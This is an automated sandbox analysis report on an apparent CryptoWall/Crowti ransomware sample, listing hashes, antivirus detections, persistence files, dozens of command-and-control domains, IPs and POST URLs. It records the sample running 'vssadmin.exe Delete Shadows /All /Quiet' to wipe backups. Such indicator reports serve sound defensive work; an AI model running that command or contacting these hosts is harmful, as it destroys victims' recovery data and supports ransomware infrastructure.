Analysis Date2015-11-14 16:46:17
MD5363935b61936a78687bdab46907e5aef
SHA14782dde6ba76d5b7344c288312d4e171c0cd14f6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionStext md5: b36c8024b10407b371a0e5331e20e9d2 sha1: 6a8a0310d91dd59ea4a799c43ca162adac0914ec size: 28672
Section.rdata md5: 38585e7ba8ad69fc19d090b1aa146825 sha1: a10369a6807c250809cbaf35cf5661c235967e19 size: 4096
Section.dat md5: 8ee0ba8cfc29eca9a52fa5609005843d sha1: 36648a8e1b00af98b935225479e3d3267ea78c5b size: 20480
Section.idta md5: 182c2418c71f9759674ebd3e1b810c03 sha1: 498f15957d2d672afa5a6ca2c9f43f3416f8c3f0 size: 4096
Sectioneloc md5: b88ea422d5a0a797938c7f252de64d15 sha1: 62a50d9411d569aab3816c0e7bb922d820d0d908 size: 8192
Timestamp2015-10-02 17:26:34
PackerMicrosoft Visual C++ v6.0
PEhash7554a0c0f9847c5b4349ea1372d975b0e49f7310
IMPhash64d0f8ba0b76e1e525c2ded596d665d2
AVF-SecureGen:Variant.Zboter.2
AVAuthentiumW32/Trojan.BDLL-0070
AVMalwareBytesTrojan.Rovnix
AVDr. WebBackDoor.Siggen.60457
AVGrisoft (avg)Inject3.NZU
AVMalwareBytesTrojan.Rovnix
AVEset (nod32)Win32/Injector.CLYT
AVMicroWorld (escan)Gen:Variant.Symmi.57537
AVTrend MicroTROJ_FORUCON.BMC
AVClamAVno_virus
AVTwisterTrojan.Injector.CLXR.axpi
AVEset (nod32)Win32/Injector.CLYT
AVBitDefenderGen:Variant.Zboter.2
AVMicroWorld (escan)Gen:Variant.Symmi.57537
AVAvira (antivir)TR/Crypt.ZPACK.203923
AVAlwil (avast)Dropper-gen [Drp]
AVFortinetW32/Generic.AC.3181361
AVMicrosoft Security EssentialsRansom:Win32/Crowti
AVIkarusTrojan.Win32.Injector
AVKasperskyTrojan.Win32.Generic
AVVirusBlokAda (vba32)no_virus
AVArcabit (arcavir)Gen:Variant.Zboter.2
AVMcafeeRDN/Generic.grp
AVAvira (antivir)TR/Crypt.ZPACK.203923
AVAd-AwareGen:Variant.Zboter.2
AVAlwil (avast)Dropper-gen [Drp]
AVSymantecPUA.Downloader
AVFortinetW32/Generic.AC.3181361
AVK7Trojan ( 004d62251 )
AVMicrosoft Security EssentialsRansom:Win32/Crowti
AVRisingno_virus
AVMcafeeRDN/Generic.grp
AVTwisterTrojan.Injector.CLXR.axpi
AVAd-AwareGen:Variant.Zboter.2
AVGrisoft (avg)Inject3.NZU
AVSymantecPUA.Downloader
AVBitDefenderGen:Variant.Zboter.2
AVK7Trojan ( 004d62251 )
AVAuthentiumW32/Trojan.BDLL-0070
AVFrisk (f-prot)no_virus
AVEmsisoftGen:Variant.Zboter.2
AVZillya!no_virus
AVCAT (quickheal)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Zboter.2
AVCA (E-Trust Ino)no_virus
AVRisingno_virus
AVIkarusTrojan.Win32.Injector
AVFrisk (f-prot)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Processvssadmin.exe Delete Shadows /All /Quiet
Creates Process-k netsvcs

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdescargar-facebook-messenger.com
Winsock DNSwebandnoticias.com
Winsock DNSmyfacecom.com
Winsock DNSasistent.su
Winsock DNSsnocmobilya.com
Winsock DNSthecarnivalfest.com
Winsock DNSeuro-dom.de
Winsock DNSnobilighting.com
Winsock DNSsadefuar.com
Winsock DNSspideragroscience.com
Winsock DNStravancy.com
Winsock DNStamazawatokuichiro.com
Winsock DNSperpabaskievi.net
Winsock DNSnaimselmonaj.com
Winsock DNSvirginia-education.com
Winsock DNSzemamranews.com
Winsock DNScurlmyip.com
Winsock DNSkonstructmarketing.com
Winsock DNSabenorbenin.com
Winsock DNSconectcon.com
Winsock DNSprimemovies.net
Winsock DNSfreeapkipa.com
Winsock DNSmyexternalip.com
Winsock DNSnoblevisage.com
Winsock DNSshopshe.com
Winsock DNSengagedforpeace.org
Winsock DNShandmade.co.id
Winsock DNSbefitster.com
Winsock DNSsudatrain.net
Winsock DNSip-addr.es
Winsock DNStheboomerzblog.com
Winsock DNSsuttonfarms.net
Winsock DNSsparshsewa.com
Winsock DNSreanimator-service.com
Winsock DNSdoozfriend.com
Winsock DNSfengfeifei.net
Winsock DNSmeaarts.com
Winsock DNSproject976.org
Winsock DNSwpwarriors.com
Winsock DNSpromofordbekasi.com
Winsock DNSxn--e1asbeck.xn--p1ai
Winsock DNSbookstower.com
Winsock DNSbasketball256.com
Winsock DNSrationwalaaa.com
Winsock DNSgrupointernex.com.br
Winsock DNSicanconsultancy.org
Winsock DNSforexinsuracembard.com
Winsock DNSipmon.net
Winsock DNSipanema-penthouse.com
Winsock DNSpretor.su
Winsock DNSvlsex.net
Winsock DNSdamozhai.com
Winsock DNStherealdiehls.com
Winsock DNScentroinformativoviral.com
Winsock DNSdroidmaza.com
Winsock DNSimmigrating.xsrv.jp
Winsock DNSsafepeace.com
Winsock DNSgainsenligne.info
Winsock DNSbolle-immobilien.de
Winsock DNStmp3malinium.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSshopshe.com
Type: A
184.168.47.225
DNSbasketball256.com
Type: A
205.144.171.82
DNSpretor.su
Type: A
195.208.1.155
DNSipanema-penthouse.com
Type: A
91.216.107.154
DNSeuro-dom.de
Type: A
213.239.234.111
DNStherealdiehls.com
Type: A
192.169.57.44
DNStheboomerzblog.com
Type: A
184.168.47.225
DNSgainsenligne.info
Type: A
193.37.145.77
DNSsudatrain.net
Type: A
185.15.244.81
DNSabenorbenin.com
Type: A
91.216.107.152
DNSwpwarriors.com
Type: A
66.96.147.101
DNSkonstructmarketing.com
Type: A
69.73.182.77
DNSnoblevisage.com
Type: A
90.156.201.87
DNSnoblevisage.com
Type: A
90.156.201.16
DNSnoblevisage.com
Type: A
90.156.201.35
DNSnoblevisage.com
Type: A
90.156.201.70
DNSfreeapkipa.com
Type: A
178.17.168.34
DNSforexinsuracembard.com
Type: A
37.187.154.90
DNSsadefuar.com
Type: A
94.73.151.78
DNSrationwalaaa.com
Type: A
103.21.59.171
DNSzemamranews.com
Type: A
51.254.207.181
DNSimmigrating.xsrv.jp
Type: A
183.90.232.29
DNSbefitster.com
Type: A
208.91.199.77
DNSsnocmobilya.com
Type: A
94.73.147.150
DNSbolle-immobilien.de
Type: A
213.239.234.111
DNSvlsex.net
Type: A
104.28.17.110
DNSvlsex.net
Type: A
104.28.16.110
DNSsuttonfarms.net
Type: A
63.135.124.25
DNSpromofordbekasi.com
Type: A
198.23.72.4
DNSasistent.su
Type: A
78.110.50.124
DNSnaimselmonaj.com
Type: A
51.254.207.61
DNSdescargar-facebook-messenger.com
Type: A
185.86.210.42
DNSdroidmaza.com
Type: A
173.233.76.118
DNSicanconsultancy.org
Type: A
111.118.215.210
DNSspideragroscience.com
Type: A
103.21.59.171
DNSdamozhai.com
Type: A
118.193.216.44
DNSreanimator-service.com
Type: A
176.114.1.110
DNSperpabaskievi.net
Type: A
77.245.149.18
DNSdoozfriend.com
Type: A
208.91.198.220
DNSproject976.org
Type: A
193.37.145.124
DNSsafepeace.com
Type: A
103.21.59.171
DNSprimemovies.net
Type: A
185.63.252.62
DNSsparshsewa.com
Type: A
103.21.59.171
DNSipmon.net
Type: A
79.140.41.112
DNStamazawatokuichiro.com
Type: A
209.54.52.223
DNSwebandnoticias.com
Type: A
143.95.251.123
DNStmp3malinium.com
Type: A
193.37.145.25
DNSengagedforpeace.org
Type: A
193.37.145.75
DNSmeaarts.com
Type: A
103.21.59.171
DNSconectcon.com
Type: A
186.202.127.240
DNScentroinformativoviral.com
Type: A
205.144.171.80
DNSxn--e1asbeck.xn--p1ai
Type: A
195.208.1.155
DNSvirginia-education.com
Type: A
37.210.196.227
DNSnobilighting.com
Type: A
112.78.2.45
DNStravancy.com
Type: A
199.79.62.19
DNSgrupointernex.com.br
Type: A
192.198.195.229
DNSbookstower.com
Type: A
143.95.252.199
DNSthecarnivalfest.com
Type: A
103.21.59.171
DNShandmade.co.id
Type: A
DNSfengfeifei.net
Type: A
DNSmyfacecom.com
Type: A
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://shopshe.com/jECfKN.php?d=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://basketball256.com/9xnMgP.php?s=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://pretor.su/ZLoNyf.php?o=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ipanema-penthouse.com/lxUs6S.php?g=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://euro-dom.de/TzmNHk.php?b=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://therealdiehls.com/K3_J96.php?s=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://theboomerzblog.com/fQu7UH.php?w=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gainsenligne.info/TiWyMt.php?n=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://sudatrain.net/De1uQF.php?c=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://abenorbenin.com/jcMISv.php?d=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://wpwarriors.com/gnHPMv.php?z=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://konstructmarketing.com/Ml63Pu.php?u=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://noblevisage.com/2qs9Rr.php?c=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://freeapkipa.com/Zw6oOb.php?i=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://forexinsuracembard.com/j97S0E.php?e=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://sadefuar.com/xdqHcr.php?w=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://rationwalaaa.com/QOPYrs.php?s=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://zemamranews.com/jxke9u.php?m=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://immigrating.xsrv.jp/5OUAvK.php?z=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://befitster.com/Bfv30s.php?y=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://snocmobilya.com/XqDZ4I.php?r=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bolle-immobilien.de/Idvn79.php?q=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://vlsex.net/O4vH1A.php?w=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://suttonfarms.net/gqd1aw.php?d=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://promofordbekasi.com/6jVb5D.php?p=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://asistent.su/docs/xdEjFf.php?m=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://naimselmonaj.com/QoYx31.php?h=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://descargar-facebook-messenger.com/UjZHsJ.php?e=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://droidmaza.com/eHViNt.php?i=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://icanconsultancy.org/nm9Eul.php?i=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://spideragroscience.com/cWo1T2.php?t=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://damozhai.com/aJPK4y.php?t=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://reanimator-service.com/Y1U5s7.php?i=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://perpabaskievi.net/VCOzj5.php?p=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://doozfriend.com/T9Hqj0.php?p=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://project976.org/zyS9Kf.php?r=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://safepeace.com/_QXEd6.php?j=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://primemovies.net/z6Hfan.php?b=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://sparshsewa.com/5a8CTM.php?m=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ipmon.net/CLuOIk.php?k=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tamazawatokuichiro.com/TkCs3y.php?i=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://webandnoticias.com/t6xe1z.php?n=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tmp3malinium.com/7DSCmu.php?n=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://engagedforpeace.org/R4uGnH.php?r=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://meaarts.com/bMUmqv.php?i=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://conectcon.com/evYR0G.php?k=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://centroinformativoviral.com/k6dYbZ.php?w=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://xn--e1asbeck.xn--p1ai/7xSCFU.php?k=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://virginia-education.com/8Ycy6k.php?j=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://asistent.su/F3eRnj.php?e=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://nobilighting.com/eX8yjr.php?u=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://travancy.com/8GBn_t.php?n=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://grupointernex.com.br/4cJIAr.php?d=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bookstower.com/bmrWeQ.php?y=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://thecarnivalfest.com/mQF14M.php?e=c4os5jxsv0u0lz
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1034 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1035 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1036 ➝ 184.168.47.225:80
Flows TCP192.168.1.1:1037 ➝ 205.144.171.82:80
Flows TCP192.168.1.1:1038 ➝ 195.208.1.155:80
Flows TCP192.168.1.1:1039 ➝ 91.216.107.154:80
Flows TCP192.168.1.1:1040 ➝ 213.239.234.111:80
Flows TCP192.168.1.1:1041 ➝ 192.169.57.44:80
Flows TCP192.168.1.1:1042 ➝ 184.168.47.225:80
Flows TCP192.168.1.1:1043 ➝ 193.37.145.77:80
Flows TCP192.168.1.1:1044 ➝ 185.15.244.81:80
Flows TCP192.168.1.1:1045 ➝ 91.216.107.152:80
Flows TCP192.168.1.1:1046 ➝ 66.96.147.101:80
Flows TCP192.168.1.1:1047 ➝ 69.73.182.77:80
Flows TCP192.168.1.1:1048 ➝ 90.156.201.87:80
Flows TCP192.168.1.1:1049 ➝ 178.17.168.34:80
Flows TCP192.168.1.1:1050 ➝ 37.187.154.90:80
Flows TCP192.168.1.1:1051 ➝ 94.73.151.78:80
Flows TCP192.168.1.1:1052 ➝ 103.21.59.171:80
Flows TCP192.168.1.1:1053 ➝ 51.254.207.181:80
Flows TCP192.168.1.1:1054 ➝ 183.90.232.29:80
Flows TCP192.168.1.1:1055 ➝ 208.91.199.77:80
Flows TCP192.168.1.1:1056 ➝ 94.73.147.150:80
Flows TCP192.168.1.1:1057 ➝ 213.239.234.111:80
Flows TCP192.168.1.1:1058 ➝ 104.28.17.110:80
Flows TCP192.168.1.1:1059 ➝ 63.135.124.25:80
Flows TCP192.168.1.1:1060 ➝ 198.23.72.4:80
Flows TCP192.168.1.1:1061 ➝ 78.110.50.124:80
Flows TCP192.168.1.1:1062 ➝ 51.254.207.61:80
Flows TCP192.168.1.1:1063 ➝ 185.86.210.42:80
Flows TCP192.168.1.1:1064 ➝ 173.233.76.118:80
Flows TCP192.168.1.1:1065 ➝ 111.118.215.210:80
Flows TCP192.168.1.1:1066 ➝ 103.21.59.171:80
Flows TCP192.168.1.1:1067 ➝ 118.193.216.44:80
Flows TCP192.168.1.1:1068 ➝ 176.114.1.110:80
Flows TCP192.168.1.1:1069 ➝ 77.245.149.18:80
Flows TCP192.168.1.1:1070 ➝ 208.91.198.220:80
Flows TCP192.168.1.1:1071 ➝ 193.37.145.124:80
Flows TCP192.168.1.1:1072 ➝ 103.21.59.171:80
Flows TCP192.168.1.1:1073 ➝ 185.63.252.62:80
Flows TCP192.168.1.1:1074 ➝ 103.21.59.171:80
Flows TCP192.168.1.1:1075 ➝ 79.140.41.112:80
Flows TCP192.168.1.1:1076 ➝ 209.54.52.223:80
Flows TCP192.168.1.1:1077 ➝ 143.95.251.123:80
Flows TCP192.168.1.1:1078 ➝ 193.37.145.25:80
Flows TCP192.168.1.1:1079 ➝ 193.37.145.75:80
Flows TCP192.168.1.1:1080 ➝ 103.21.59.171:80
Flows TCP192.168.1.1:1081 ➝ 186.202.127.240:80
Flows TCP192.168.1.1:1082 ➝ 205.144.171.80:80
Flows TCP192.168.1.1:1083 ➝ 195.208.1.155:80
Flows TCP192.168.1.1:1084 ➝ 37.210.196.227:80
Flows TCP192.168.1.1:1085 ➝ 78.110.50.124:80
Flows TCP192.168.1.1:1086 ➝ 112.78.2.45:80
Flows TCP192.168.1.1:1087 ➝ 199.79.62.19:80
Flows TCP192.168.1.1:1088 ➝ 192.198.195.229:80
Flows TCP192.168.1.1:1089 ➝ 143.95.252.199:80
Flows TCP192.168.1.1:1090 ➝ 103.21.59.171:80

Raw Pcap

Strings